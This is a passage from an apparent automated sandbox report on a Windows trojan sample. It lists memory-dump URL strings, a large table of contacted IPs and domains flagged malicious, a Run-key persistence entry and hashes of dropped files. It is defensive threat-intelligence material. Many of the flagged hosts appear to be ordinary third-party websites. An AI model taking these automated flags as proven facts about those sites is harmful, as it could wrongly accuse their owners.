OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.myropcb.com/why-use-myro/terms-of-service/OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.pcgrate.comOWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://lolipop.jp/OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.592879223.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.485425382.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.376721219.0000000006C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.381685715.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.com-sit.com/feed/OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              192.252.159.165
                                                                                                                                                                              icd-host.comUnited States
                                                                                                                                                                              3561CENTURYLINK-LEGACY-SAVVISUStrue
                                                                                                                                                                              217.69.139.150
                                                                                                                                                                              unknownRussian Federation
                                                                                                                                                                              47764MAILRU-ASMailRuRUtrue
                                                                                                                                                                              203.137.75.45
                                                                                                                                                                              okashimo.comJapan4694IDCFIDCFrontierIncJPtrue
                                                                                                                                                                              172.67.152.159
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              217.160.0.131
                                                                                                                                                                              mackusick.deGermany
                                                                                                                                                                              8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                              3.130.204.160
                                                                                                                                                                              hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comUnited States
                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                              217.79.184.35
                                                                                                                                                                              www.tyrns.comGermany
                                                                                                                                                                              24961MYLOC-ASIPBackboneofmyLocmanagedITAGDEtrue
                                                                                                                                                                              5.189.171.125
                                                                                                                                                                              muhr-soehne.deGermany
                                                                                                                                                                              51167CONTABODEtrue
                                                                                                                                                                              194.143.194.23
                                                                                                                                                                              reproar.comSpain
                                                                                                                                                                              8311REDESTELRedestel-RedesdigitalesdeTelecomunicacionenItrue
                                                                                                                                                                              83.223.113.46
                                                                                                                                                                              dataform.co.ukUnited Kingdom
                                                                                                                                                                              29017GYRONGBtrue
                                                                                                                                                                              91.229.22.126
                                                                                                                                                                              pleszew.policja.gov.plPoland
                                                                                                                                                                              198704CSD-KGP-PL-ASBiuroLacznosciiInformatykiPLtrue
                                                                                                                                                                              5.39.75.157
                                                                                                                                                                              bosado.comFrance
                                                                                                                                                                              16276OVHFRtrue
                                                                                                                                                                              104.21.26.121
                                                                                                                                                                              aiolos-sa.grUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              217.74.161.133
                                                                                                                                                                              cnti.krsn.ruRussian Federation
                                                                                                                                                                              16300INTERTAX-AREARUtrue
                                                                                                                                                                              83.167.255.150
                                                                                                                                                                              dzm.czCzech Republic
                                                                                                                                                                              24971MASTER-ASCzechRepublicwwwmasterczCZtrue
                                                                                                                                                                              66.226.70.66
                                                                                                                                                                              mail.airmail.netUnited States
                                                                                                                                                                              30447INFB2-ASUSfalse
                                                                                                                                                                              13.248.169.48
                                                                                                                                                                              onzcda.comUnited States
                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                              104.21.73.229
                                                                                                                                                                              x96.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              85.128.196.22
                                                                                                                                                                              strazynski.plPoland
                                                                                                                                                                              15967NAZWAPLtrue
                                                                                                                                                                              202.254.236.40
                                                                                                                                                                              www.naoi-a.comJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                              67.21.93.239
                                                                                                                                                                              603888.comUnited States
                                                                                                                                                                              46844ST-BGPUStrue
                                                                                                                                                                              81.2.194.241
                                                                                                                                                                              www.edimart.huCzech Republic
                                                                                                                                                                              24806INTERNET-CZKtis238403KtisCZfalse
                                                                                                                                                                              18.179.184.212
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                              13.113.204.223
                                                                                                                                                                              k-nikko.comUnited States
                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                              217.19.254.22
                                                                                                                                                                              shanks.co.ukUnited Kingdom
                                                                                                                                                                              60819SAFENAMES-ASGBtrue
                                                                                                                                                                              216.177.137.32
                                                                                                                                                                              fortknox.bmUnited States
                                                                                                                                                                              3955321P-WSSUStrue
                                                                                                                                                                              93.189.66.202
                                                                                                                                                                              ssm.chSwitzerland
                                                                                                                                                                              12347VIRTUALTECCHtrue
                                                                                                                                                                              109.71.54.22
                                                                                                                                                                              akdeniz.nlNetherlands
                                                                                                                                                                              202053UPCLOUDFItrue
                                                                                                                                                                              219.94.129.97
                                                                                                                                                                              web-york.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                              74.208.215.145
                                                                                                                                                                              indonesiamedia.comUnited States
                                                                                                                                                                              8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                              104.21.89.126
                                                                                                                                                                              kavram.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              54.36.175.146
                                                                                                                                                                              biurohera.plFrance
                                                                                                                                                                              16276OVHFRtrue
                                                                                                                                                                              49.12.155.123
                                                                                                                                                                              adventist.roGermany
                                                                                                                                                                              24940HETZNER-ASDEtrue
                                                                                                                                                                              104.26.10.81
                                                                                                                                                                              www.com-sit.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              145.239.5.159
                                                                                                                                                                              ramkome.comFrance
                                                                                                                                                                              16276OVHFRtrue
                                                                                                                                                                              46.30.60.158
                                                                                                                                                                              ncn.deGermany
                                                                                                                                                                              15817MITTWALD-ASMittwaldCMServiceGmbHundCoKGDEtrue
                                                                                                                                                                              104.21.23.9
                                                                                                                                                                              www.jenco.co.ukUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              78.46.224.133
                                                                                                                                                                              amic.atGermany
                                                                                                                                                                              24940HETZNER-ASDEtrue
                                                                                                                                                                              192.99.226.184
                                                                                                                                                                              s5w.comCanada
                                                                                                                                                                              16276OVHFRtrue
                                                                                                                                                                              104.21.55.151
                                                                                                                                                                              cvswl.orgUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              195.78.66.50
                                                                                                                                                                              www.photo4b.comPoland
                                                                                                                                                                              41079SUPERHOST-PL-ASPLfalse
                                                                                                                                                                              137.118.26.67
                                                                                                                                                                              fnw.usUnited States
                                                                                                                                                                              6250NEONOVA-NETUStrue
                                                                                                                                                                              188.166.152.188
                                                                                                                                                                              www.c9dd.comNetherlands
                                                                                                                                                                              14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                              104.26.13.244
                                                                                                                                                                              scip.org.ukUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              210.140.73.39
                                                                                                                                                                              at-shun.comJapan4694IDCFIDCFrontierIncJPtrue
                                                                                                                                                                              70.39.251.249
                                                                                                                                                                              quadlock.comUnited States
                                                                                                                                                                              54641INMOTI-1USfalse
                                                                                                                                                                              104.26.7.221
                                                                                                                                                                              www.valdal.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              62.122.170.171
                                                                                                                                                                              shztm.ruCzech Republic
                                                                                                                                                                              50245SERVEREL-ASNLtrue
                                                                                                                                                                              212.44.102.75
                                                                                                                                                                              oozkranj.comSlovenia
                                                                                                                                                                              43128DHH-ASSItrue
                                                                                                                                                                              72.251.233.245
                                                                                                                                                                              www.koz1.netUnited States
                                                                                                                                                                              29791VOXEL-DOT-NETUStrue
                                                                                                                                                                              104.21.42.10
                                                                                                                                                                              www.wifi4all.nlUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              172.67.152.88
                                                                                                                                                                              www.rs-ag.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              203.0.113.0
                                                                                                                                                                              nme.co.jpReserved
                                                                                                                                                                              136518WA-GOVERNMENT-AS-APWAGovernmentprojectAUtrue
                                                                                                                                                                              216.239.32.21
                                                                                                                                                                              calvinly.comUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              172.67.196.25
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              82.201.61.230
                                                                                                                                                                              www.nelipak.nlNetherlands
                                                                                                                                                                              15879KPN-INTERNEDSERVICESNLfalse
                                                                                                                                                                              104.21.25.200
                                                                                                                                                                              www.fcwcvt.orgUnited States
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              156.251.140.23
                                                                                                                                                                              likangds.comSeychelles
                                                                                                                                                                              40065CNSERVERSUStrue
                                                                                                                                                                              192.124.249.3
                                                                                                                                                                              pers.comUnited States
                                                                                                                                                                              30148SUCURI-SECUStrue
                                                                                                                                                                              61.200.81.21
                                                                                                                                                                              yasuma.comJapan2914NTT-COMMUNICATIONS-2914UStrue
                                                                                                                                                                              172.67.97.62
                                                                                                                                                                              fundeo.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              52.71.57.184
                                                                                                                                                                              unknownUnited States
                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                              192.241.158.94
                                                                                                                                                                              nunomira.comUnited States
                                                                                                                                                                              14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                              172.67.164.178
                                                                                                                                                                              www.clinicasanluis.com.coUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              104.21.68.7
                                                                                                                                                                              dayvo.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              195.96.252.188
                                                                                                                                                                              nlcv.bas.bgBulgaria
                                                                                                                                                                              8745AS-BG-BASBGtrue
                                                                                                                                                                              104.21.24.39
                                                                                                                                                                              ifesnet.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              85.233.160.146
                                                                                                                                                                              hbfuels.comUnited Kingdom
                                                                                                                                                                              8622ISIONUKNamescoLimitedGBtrue
                                                                                                                                                                              204.11.56.50
                                                                                                                                                                              mjrcpas.comVirgin Islands (BRITISH)
                                                                                                                                                                              40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                              165.227.252.190
                                                                                                                                                                              crcsi.orgUnited States
                                                                                                                                                                              14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                              199.34.228.78
                                                                                                                                                                              ftmobile.comUnited States
                                                                                                                                                                              27647WEEBLYUStrue
                                                                                                                                                                              103.168.172.217
                                                                                                                                                                              in1.smtp.messagingengine.comunknown
                                                                                                                                                                              7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                              185.230.63.107
                                                                                                                                                                              acraloc.comIsrael
                                                                                                                                                                              58182WIX_COMILtrue
                                                                                                                                                                              198.185.159.144
                                                                                                                                                                              captlfix.comUnited States
                                                                                                                                                                              53831SQUARESPACEUStrue
                                                                                                                                                                              211.13.196.162
                                                                                                                                                                              unknownJapan7514MEXComputerEngineeringConsultingLtdJPtrue
                                                                                                                                                                              103.168.172.221
                                                                                                                                                                              unknownunknown
                                                                                                                                                                              7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                              141.193.213.20
                                                                                                                                                                              johnlyon.orgUnited States
                                                                                                                                                                              396845DV-PRIMARY-ASN1UStrue
                                                                                                                                                                              35.172.94.1
                                                                                                                                                                              themark.orgUnited States
                                                                                                                                                                              14618AMAZON-AESUStrue
                                                                                                                                                                              154.201.225.123
                                                                                                                                                                              revoldia.netSeychelles
                                                                                                                                                                              132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                                                                                                              195.128.140.29
                                                                                                                                                                              nettle.plPoland
                                                                                                                                                                              56590RBO-NETPLtrue
                                                                                                                                                                              76.223.35.103
                                                                                                                                                                              nrsi.comUnited States
                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                              92.204.129.113
                                                                                                                                                                              lpver.comGermany
                                                                                                                                                                              398108GO-DADDY-COM-LLCUStrue
                                                                                                                                                                              69.163.239.62
                                                                                                                                                                              sjbs.orgUnited States
                                                                                                                                                                              26347DREAMHOST-ASUSfalse
                                                                                                                                                                              66.94.119.160
                                                                                                                                                                              www.yocinc.orgUnited States
                                                                                                                                                                              394513AWESOMENET-CORPUSfalse
                                                                                                                                                                              154.203.14.100
                                                                                                                                                                              www.mobilnic.netSeychelles
                                                                                                                                                                              135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                                                                                                                                                                              108.167.164.216
                                                                                                                                                                              aevga.comUnited States
                                                                                                                                                                              46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                              5.196.166.214
                                                                                                                                                                              www.spanesi.comFrance
                                                                                                                                                                              16276OVHFRfalse
                                                                                                                                                                              47.91.167.60
                                                                                                                                                                              popbook.comUnited States
                                                                                                                                                                              45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                                                              64.125.133.18
                                                                                                                                                                              reglera.comUnited States
                                                                                                                                                                              393631DLSS-CA-EMERYVILLE-ASUSfalse
                                                                                                                                                                              213.186.33.17
                                                                                                                                                                              unknownFrance
                                                                                                                                                                              16276OVHFRfalse
                                                                                                                                                                              219.94.128.87
                                                                                                                                                                              angework.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                              104.21.234.121
                                                                                                                                                                              missnue.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              104.21.8.75
                                                                                                                                                                              siongann.comUnited States
                                                                                                                                                                              13335CLOUDFLARENETUStrue
                                                                                                                                                                              93.187.206.66
                                                                                                                                                                              www.yoruksut.comTurkey
                                                                                                                                                                              43391NETDIREKT-ASTRtrue
                                                                                                                                                                              82.208.6.9
                                                                                                                                                                              insia.comCzech Republic
                                                                                                                                                                              15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                                                                                                                                                              157.112.176.4
                                                                                                                                                                              www.11tochi.netJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                              75.2.70.75
                                                                                                                                                                              sidepath.comUnited States
                                                                                                                                                                              16509AMAZON-02UStrue
                                                                                                                                                                              54.161.222.85
                                                                                                                                                                              hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comUnited States
                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                              211.1.226.67
                                                                                                                                                                              www.ka-mo-me.comJapan7671MCNETNTTSmartConnectCorporationJPfalse
                                                                                                                                                                              IP
                                                                                                                                                                              127.0.0.1
                                                                                                                                                                              Joe Sandbox Version:38.0.0 Beryl
                                                                                                                                                                              Analysis ID:1308712
                                                                                                                                                                              Start date and time:2023-09-15 07:25:05 +02:00
                                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 11m 2s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                              Number of analysed new started processes analysed:31
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • HDC enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Sample file name:OWd39WUX3D.exe
                                                                                                                                                                              Original Sample Name:dc6330aff08812b5dbaf66cf0671cb20.exe
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal100.spre.troj.evad.winEXE@28/4@2171/100
                                                                                                                                                                              EGA Information:
                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                              HDC Information:Failed
                                                                                                                                                                              HCA Information:
                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                              • Number of executed functions: 140
                                                                                                                                                                              • Number of non-executed functions: 272
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 104.21.63.28, 172.67.142.169, 204.79.197.212
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, www.ottospm.com.cdn.cloudflare.net, login.live.com, tse1.mm.bing.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, arc.msn.com, wu-bg-shim.trafficmanager.net, a-0010.a-msedge.net
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                              07:26:53API Interceptor2x Sleep call for process: OWd39WUX3D.exe modified
                                                                                                                                                                              07:27:10API Interceptor2x Sleep call for process: pigalicapi.exe modified
                                                                                                                                                                              07:27:52API Interceptor1409x Sleep call for process: svchost.exe modified
                                                                                                                                                                              22:26:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                              22:26:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                              Process:C:\Users\user\Desktop\OWd39WUX3D.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):46
                                                                                                                                                                              Entropy (8bit):1.0424600748477153
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:/lbON:u
                                                                                                                                                                              MD5:89CA7E02D8B79ED50986F098D5686EC9
                                                                                                                                                                              SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                                                                                                                                                                              SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                                                                                                                                                                              SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:........................................user.
                                                                                                                                                                              Process:C:\Users\user\Desktop\OWd39WUX3D.exe
                                                                                                                                                                              File Type:Matlab v4 mat-file (little endian) , sparse, rows 0, columns 22
                                                                                                                                                                              Category:modified
                                                                                                                                                                              Size (bytes):1446
                                                                                                                                                                              Entropy (8bit):7.405707560179789
                                                                                                                                                                              Encrypted:false
